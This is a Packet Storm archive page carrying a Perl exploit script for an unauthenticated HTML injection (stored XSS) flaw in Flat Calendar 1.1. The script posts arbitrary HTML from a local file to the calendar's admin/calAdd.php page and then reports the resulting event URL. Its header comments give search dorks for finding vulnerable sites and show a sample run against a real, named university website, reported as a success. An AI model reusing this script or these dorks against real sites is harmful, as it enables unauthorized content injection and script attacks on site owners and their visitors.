what you don't know can hurt you

Flat Calendar 1.1 HTML Injection

Flat Calendar 1.1 HTML Injection
Posted Dec 8, 2014
Authored by ZoRLu

Flat Calendar version 1.1 suffers from an unauthenticated html injection vulnerability that allows for cross site scripting attacks.

tags | exploit, xss
MD5 | 55222bbc4a43bc1ba126b0b2ddd9d485

Flat Calendar 1.1 HTML Injection

Change Mirror Download
#!/usr/bin/perl -w
#Title : Flat Calendar v1.1 HTML Injection Exploit
#Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
#Author : ZoRLu / zorlu@milw00rm.com
#Website : http://milw00rm.com / its online
#Twitter : https://twitter.com/milw00rm or @milw00rm
#Test : Windows7 Ultimate
#Date : 08/12/2014
#Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
#Dork1 : intext:"Flat Calendar is powered by Flat File DB"
#Dork2 : inurl:"viewEvent.php?eventNumber="
#
#C:\Users\admin\Desktop>perl flat.pl
#
#Usage: perl flat.pl http://target.com /calender_path/ indexfile nickname
#Exam1: perl flat.pl http://localhost / index.html ZoRLu
#Exam2: perl flat.pl http://localhost /calendar/ index.html ZoRLu
#
#C:\Users\admin\Desktop>perl flat.pl http://jcbc.jesus.cam.ac.uk /member_content/diaries/womens/calendar/ index.html ZoRLu
#
#[+] Target: http://jcbc.jesus.cam.ac.uk
#[+] Path: /member_content/diaries/womens/calendar/
#[+] index: index.html
#[+] Nick: ZoRLu
#[+] Exploit Succes
#[+] Searching url...
#[+] YourEventNumber = 709
#[+] http://jcbc.jesus.cam.ac.uk/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709

use HTTP::Request::Common qw( POST );
use LWP::UserAgent;
use IO::Socket;
use strict;
use warnings;

sub hlp() {

system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "\nUsage: perl $0 http://target.com /calender_path/ indexfile nickname\n";
print "Exam1: perl $0 http://localhost / index.html ZoRLu\n";
print "Exam2: perl $0 http://localhost /calendar/ index.html ZoRLu\n";

}

if(@ARGV != 4) {

hlp();
exit();

}

my $ua = LWP::UserAgent->new;
my $url = $ARGV[0];
my $path = $ARGV[1];
my $index = $ARGV[2];
my $nick = $ARGV[3];
my $vuln = $url . $path . "admin/calAdd.php";

print "\n[+] Target: ".$url."\n";
print "[+] Path: ".$path."\n";
print "[+] index: ".$index."\n";
print "[+] Nick: ".$nick."\n";

my @months = qw(January February March April May June July August September October November December);
my ($day, $month, $yearset) = (localtime)[3,4,5];
my $year = 1900 + $yearset;
my $moon = $months[$month];

if (open(my $fh, $index)) {

while (my $row = <$fh>) {
chomp $row;

my $req = POST $vuln, [
event => 'Test Page',
description => $row,
month => $moon,
day => $day,
year => $year,
submitted => $nick,
];


my $resp = $ua->request($req);
if ($resp->is_success) {
my $message = $resp->decoded_content;
my $regex = "Record Added: taking you back";
if ($message =~ /$regex/) {
print "[+] Exploit Succes\n";

my $newua = LWP::UserAgent->new( );
my $newurl = $url . $path . "calendar.php";
my $newreq = $newua->get($newurl);
if ($newreq->is_success) {
my $newmessage = $newreq->decoded_content;

my $first = rindex($newmessage,"viewEvent.php?eventNumber=");
print "[+] Searching url...\n";
my $request = substr($newmessage, $first+26, 4);
print "[+] YourEventNumber = $request\n";
sleep(1);
print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n";

}

else {
print "[-] HTTP POST error code: ", $newreq->code, "\n";
print "[-] HTTP POST error message: ", $newreq->message, "\n";
}

}
else {

print "[-] Exploit Failed";

}
}
else {
print "[-] HTTP POST error code: ", $resp->code, "\n";
print "[-] HTTP POST error message: ", $resp->message, "\n";
}
}
}
else {

sleep(1);
die ("[-] NotFound: $index\n");

}
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close